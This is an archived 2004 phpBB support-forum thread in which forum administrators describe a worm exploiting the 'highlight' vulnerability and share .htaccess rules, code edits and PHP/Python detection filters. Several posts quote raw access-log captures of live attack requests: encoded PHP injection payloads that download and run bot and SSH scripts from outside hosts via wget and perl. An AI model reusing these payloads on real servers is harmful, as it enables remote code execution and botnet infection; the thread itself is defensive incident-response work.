Viral and/or distributed attack on highlight exploit

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Viral and/or distributed attack on highlight exploit

Post by RonS »

One of my forums is getting attacked by machines around the world trying to take advantage of the "highlight" vulnerability. My system is patched, but there are 9,000 pages in Google's cache that say I am not patched... that's my best guess as to why that's happening.

Anyway, besides a large load on the system, about 40 queries per minute right now, these queries were filling my sessions table.

The sessions table is a heap table, and is limited by default apparently to 1100 rows. I had my session timeout set to 1 hour, so with simple math, 40*60=2400, or more than double the MAX_ROWS for the table. There's more info available on the sessions table elsewhere in a kb entry. (That article can be found at http://www.phpbb.com/kb/article.php?article_id=42 Thanks to r45 for finding that for us)

This caused phpbb to effectively shut down and prevent new visitors of any type, with an error about a full sessions table.

I logged in through SSH and simply truncated the sessions table; then I decided to eliminate the problem, at least until phpbb does something about it; here's what I did.

I created a page that essentially said "Sorry, you can't use the highlight feature right now." While I was working the problem, if anyone tried to do a search it would fail, so I thought I'd tell them why. It is also where ALL requests containing the term highlight will be redirected.

Then I created an .htaccess file in the forum's root directory with three lines:

Code:

RewriteEngine On

# Any request whose query string carries a highlight= parameter is redirected to the notice page
RewriteCond %{QUERY_STRING} highlight=([^&]+)
RewriteRule .* http://domain.com/sorry.html?qu=nope [R,L]
Then I edited phpbb... removing highlight code from two files, so that my real visitors can do searches and the term "highlight" won't appear in the url (which would get them sent to that error page):
viewtopic.php around line 695 find:

Code:

'U_VIEW_TOPIC' => append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . "=$topic_id&start=$start&postdays=$post_days&postorder=$post_order&highlight=$highlight"),
And replace with

Code:

// the trailing "&highlight=$highlight" is dropped, so nothing is left dangling after $post_order
'U_VIEW_TOPIC' => append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . "=$topic_id&start=$start&postdays=$post_days&postorder=$post_order"),
search.php around line 845 find:

Code:

$topic_url = append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . '=' . $searchset[$i]['topic_id'] . "&highlight=$highlight_active");
$post_url = append_sid("viewtopic.$phpEx?" . POST_POST_URL . '=' . $searchset[$i]['post_id'] . "&highlight=$highlight_active") . '#' . $searchset[$i]['post_id'];
replace with

Code:

$topic_url = append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . '=' . $searchset[$i]['topic_id']);
$post_url = append_sid("viewtopic.$phpEx?" . POST_POST_URL . '=' . $searchset[$i]['post_id']) . '#' . $searchset[$i]['post_id'];
Like I said, this will do until phpbb figures out how to help.

I'm sorry if this is in the wrong forum, or otherwise violates some rule. If I had more time, I'd go and figure out exactly how and where to submit this. I'm also sorry that I can't take the time to finesse this post up a bit, I have to run to visit my Dad in the hospital (He's ok, thanks for asking.)
Good luck!
-Ron.

EDIT: Fixed typos in the narrative, and added ". $searchset[$i]['post_id'];" in 2nd line of new search.php (hacked off by accident in the posting process)
Last edited by RonS on Sat Dec 25, 2004 1:32 am, edited 1 time in total.
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Post by RonS »

Dad's great, thanks.

Here are a couple of hack attempts. I changed sorry.html to capture the requests.

Code:

          Fri, 24 Dec 2004 18:57:24 -0600|64.92.163.122||lwp-trivial/1.41|/sorry.php?t=412&highlight=%252527%25252esystem(chr(108)%25252echr(115)%25252echr(32)%25252echr(47)%25252echr(116)%25252echr(109)%25252echr(112))%25252e%252527
         Fri, 24 Dec 2004 18:57:24 -0600|64.92.163.122||lwp-trivial/1.41|/sorry.php?t=412&highlight=%252527%25252esystem(chr(99)%25252echr(100)%25252echr(32)%25252echr(47)%25252echr(116)%25252echr(109)%25252echr(112)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(105)%25252echr(108)%25252echr(115)%25252echr(103)%25252echr(100)%25252echr(98)%25252echr(103)%25252echr(107)%25252echr(108)%25252echr(115)%25252echr(100)%25252echr(102)%25252echr(102)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(105)%25252echr(108)%25252echr(115)%25252echr(103)%25252echr(100)%25252echr(98)%25252echr(103)%25252echr(107)%25252echr(108)%25252echr(115)%25252echr(100)%25252echr(102)%25252echr(102)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(97)%25252echr(100)%25252echr(102)%25252echr(107)%25252echr(103)%25252echr(110)%25252echr(110)%25252echr(111)%25252echr(100)%25252echr(102)%25252echr(105)%25252echr(106)%25252echr(103)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(97)%25252echr(100)%25252echr(102)%25252echr(107)%25252echr(103)%25252echr(110)%25252echr(110)%25252echr(111)%25252echr(100)%25252echr(102)%25252echr(105)%25252echr(106)%25252echr(103))%25252e%252527
         Fri, 24 Dec 2004 18:57:39 -0600|216.67.227.252||LWP::Simple/5.801|/sorry.php?t=756&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:57:49 -0600|66.195.243.169||LWP::Simple/5.803|/sorry.php?t=344&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:23 -0600|66.194.239.52||LWP::Simple/5.803|/sorry.php?t=344&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:33 -0600|83.98.136.66||LWP::Simple/5.801|/sorry.php?t=686&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:36 -0600|66.152.98.101||LWP::Simple/5.79|/sorry.php?t=132&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:39 -0600|66.98.134.100||lwp-trivial/1.35|/sorry.php?t=569&highlight=%252527%25252esystem(chr(99)%25252echr(100)%25252echr(32)%25252echr(47)%25252echr(116)%25252echr(109)%25252echr(112)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(98)%25252echr(111)%25252echr(116)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(98)%25252echr(111)%25252echr(116)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(119)%25252echr(111)%25252echr(114)%25252echr(109)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(119)%25252echr(111)%25252echr(114)%25252echr(109)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116))%25252e%252527
         Fri, 24 Dec 2004 18:58:41 -0600|195.166.130.140||LWP::Simple/5.76|/sorry.php?p=680&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
As you can see, they're still coming in and from all over. The frequency comes and goes in waves. This was 9 attempts in a little more than a minute, not the 40/minute I was seeing before. It looks like phpbb itself is under the same kind of "attack", as the index page is reporting 300-400 guests online on Christmas/Christmas Eve around the world, but that could be normal as far as I know.

R45
Registered User
Posts: 2830
Joined: Tue Nov 27, 2001 10:42 pm

Post by R45 »

You should also review this article -> http://www.phpbb.com/kb/article.php?article_id=42 <- as it covers a side-effect of the worm hammering your forum.
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Post by RonS »

Average request size over the last half hour is nearly 1,400 bytes.

1,400 * 40/minute * 60 minutes * 24 hours * 31 days

1,400 * 40/minute = 56,000 ~ 55K/minute

56,000 * 60 minutes = 3,360,000 ~ 3.3MB/hour

3,360,000 * 24 hours = 80,640,000 ~ 79MB/day

80,640,000 * 31 days = 2,499,840,000 ~ 2.4GB/month in extra traffic, just for the requests. Each response for a safe 2.0.11 board without my modification is likely to be in the 15K range (with GZIP enabled!), or about another 25GB.

That's almost 30GB a month in traffic.

Just so you know it's not just an inconvenience.
Last edited by RonS on Sat Dec 25, 2004 1:33 am, edited 1 time in total.
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Post by RonS »

R45 wrote: You should also review this article -> http://www.phpbb.com/kb/article.php?article_id=42 <- as it covers a side-effect of the worm hammering your forum.

Yes, thanks. That's exactly the kb article to which I was referring. I'm going to add it to my original post for completeness.

Thanks for re-finding that for me!
TheScienceForum
Registered User
Posts: 14
Joined: Mon Nov 01, 2004 7:31 am
Location: Phoenix AZ

Post by TheScienceForum »

I actually made the phpBB Credits a Javascript document.write months ago, hiding the phpBB fact from Google. Still I'm getting hit. Odd.

I also got sick of AdSense trying to sell other people phpBB hosting.
Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Re: Viral and/or distributed attack on highlight exploit

Post by Hynee »

RonS wrote: One of my forums is getting attacked by machines around the world trying to take advantage of the "highlight" vulnerability. My system is patched, but there are 9,000 pages in Google's cache that say I am not patched... that's my best guess as to why that's happening.


Yes, I'm getting the same effect over at my forums. Google has effectively shut down Santy.A, so I believe this is some variant that hasn't been reported yet and is finding sites through some other means (maybe even just MSN Search or Yahoo; it would be a very simple mod since Santy.A is just Perl text scripts, rather than binary).

I'm getting the same User Agent/Query strings as you too.

This mod to includes/page_header.php can catch it. Place it at the start of the file:

Code:

//Worm prevention
$user_agent   = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$query_string = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';

// The worm's query strings arrive double/triple URL-encoded (%2527, %25252e, %2524 ...),
// so peel off the encoding layers before matching; the raw string is still checked as well.
$decoded = $query_string;
for ($i = 0; $i < 3 && strpos($decoded, '%') !== false; $i++) {
  $decoded = rawurldecode($decoded);
}

// Perl LWP user agents seen in the access logs, e.g. LWP::Simple/5.803 and lwp-trivial/1.41
$UA_Match = preg_match('#LWP(::Simple|-trivial)/\d\.\d+#i', $user_agent);
$QueryMatch = (
  (preg_match_all('#chr\(\d+\)#i', $decoded, $matches) > 10) || // chr(xxx) where xxx is digits; short commands stay under the threshold
  (strpos($query_string, '%24HTTP_GET_VARS') !== false) ||      // $HTTP_GET_VARS encoded once ...
  (strpos($decoded, '$HTTP_GET_VARS') !== false)                // ... or fully decoded; strpos() needs !== false, since 0 is a valid offset
);

if ($UA_Match || $QueryMatch) {
  echo 'Error: This query has been detected as a hacking attempt. If this is incorrect, please contact the webmaster.';
  die();
}

//END Worm protection
You can put in whatever error message you want. One variation on this that may help with the full sessions table is to make the worm wait a long time before the page is fully read. Try

Code:

if ($UA_Match || $QueryMatch) {
  echo 'Error: This query has been detected as a hacking attempt. If this is incorrect, please contact the webmaster.';
  flush();
  sleep(60);
  die();
}
flush() sends the content you've echoed, and sleep(x) delays the end of the script by x seconds. This may or may not slow up the worm (I don't have a worm to test with!).
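As an added example (not code from this thread), here is the triage Hynee's page_header.php rules perform, run offline over capture lines in the date|ip||user-agent|path layout RonS posted, with the nested percent-encoding peeled off before matching. The sample lines are constructed for this example (documentation addresses, chr() chains that spell harmless text), and the seven-call chain in the first line shows why the user-agent rule matters: it stays under the ten-call threshold, just like the first line of RonS's capture.

```python
import re
from urllib.parse import unquote

# Constructed sample in the "date|ip||user-agent|path" layout of the capture above.
# 192.0.2.x are documentation addresses; the chr() chains spell "foo bar" / "hello world!".
SAMPLE_LOG = """\
Fri, 24 Dec 2004 18:57:24 -0600|192.0.2.10||lwp-trivial/1.41|/sorry.php?t=412&highlight=%252527%25252esystem(chr(102)%25252echr(111)%25252echr(111)%25252echr(32)%25252echr(98)%25252echr(97)%25252echr(114))%25252e%252527
Fri, 24 Dec 2004 18:57:39 -0600|192.0.2.11||LWP::Simple/5.801|/sorry.php?t=756&rush=%2565%2563%2568%256F%2520hi&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
Fri, 24 Dec 2004 19:01:02 -0600|192.0.2.12||Mozilla/5.0 (X11; Linux) Firefox/1.0|/viewtopic.php?t=412&highlight=sessions+table
Fri, 24 Dec 2004 19:02:10 -0600|192.0.2.13||Mozilla/4.0 (compatible; MSIE 6.0)|/viewtopic.php?t=99&highlight=%2527%252eprint(chr(104)%252echr(101)%252echr(108)%252echr(108)%252echr(111)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(108)%252echr(100)%252echr(33))%252e%2527
"""

# The three rules from Hynee's snippet: Perl LWP user agents, more than ten
# chr() calls, or a reference to $HTTP_GET_VARS in the query string.
LWP_UA = re.compile(r"LWP(::Simple|-trivial)/\d\.\d+", re.I)
CHR_CALL = re.compile(r"chr\(\d+\)", re.I)
CHR_THRESHOLD = 10

def peel_encoding(s, max_layers=4):
    """Strip nested percent-encoding (the worm double/triple encodes) until stable."""
    for _ in range(max_layers):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def parse_line(line):
    date, ip, _, ua, path = line.split("|", 4)
    return {"date": date, "ip": ip, "ua": ua, "query": path.partition("?")[2]}

def classify(entry):
    """Names of the rules the request trips; an empty list means it looks legitimate."""
    hits = []
    if LWP_UA.search(entry["ua"]):
        hits.append("lwp-user-agent")
    decoded = peel_encoding(entry["query"])  # match the decoded form, not the wire form
    n_chr = len(CHR_CALL.findall(decoded))
    if n_chr > CHR_THRESHOLD:
        hits.append("chr-count=%d" % n_chr)
    if "$HTTP_GET_VARS" in decoded:
        hits.append("http-get-vars")
    return hits

def triage(log_text):
    """Map each flagged source IP to the rules it tripped; clean requests are omitted."""
    flagged = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        hits = classify(entry)
        if hits:
            flagged[entry["ip"]] = hits
    return flagged
```

Running triage(SAMPLE_LOG) flags three of the four lines; the Firefox search with highlight=sessions+table passes every rule, which is the traffic RonS's blanket highlight= redirect would still have turned away.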
smithy_dll
Former Team Member
Posts: 7630
Joined: Tue Jan 08, 2002 6:27 am
Location: Australia
Name: Lachlan Smith

Post by smithy_dll »

The rewrite rule in this topic is better:
http://www.phpbb.com/phpBB/viewtopic.ph ... 15#1361215


You don't need the worm to test those highlight rules; you would if you were doing the user agent. However, stopping it at .htaccess is less resource intensive on your server.
Systems Engineering
Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Post by Hynee »

smithy_dll wrote: The rewrite rule in this topic is better:
http://www.phpbb.com/phpBB/viewtopic.ph ... 15#1361215


OK, I'll just let the Admins come up with the solution to server load problems caused by worms.

smithy_dll wrote: You don't need the worm to test those highlight rules; you would if you were doing the user agent, ...

You don't need the worm to test User Agent screening methods; you can just change your user agent in Firefox with the User Agent Switcher extension (http://extensionroom.mozdev.org/more-in ... ntswitcher). The pattern '#LWP(\:\:Simple|\-trivial)\/\d\.\d+#i' should get all Perl LWP calls made by Santy, but I'm only going on what I read in the access logs. I tried 'LWP::Simple/5.803' and 'lwp-trivial/1.41' as user agents.
smithy_dll wrote: ... however stopping it at htaccess is less resource intensive on your server

OK, so only people using IIS or something non-Apache need something other than .htaccess mods.
smithy_dll
Former Team Member
Posts: 7630
Joined: Tue Jan 08, 2002 6:27 am
Location: Australia
Name: Lachlan Smith

Post by smithy_dll »

I thought the worm doesn't affect Windows systems, as it uses Unix commands to copy itself in the initial query.

edit: and the htaccess rule in the other thread is better because it deals directly with the issue, is secure, and doesn't modify the original phpBB (which voids support)
Systems Engineering
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

Last time I checked, support-related queries did not belong in phpBB Discussion, so moved appropriately. Furthermore, please see the stickies atop this forum for more information. And finally, locked. If you like, you may nicely PM me for details.
Proven Offensive Security Expertise. OSCP - GXPN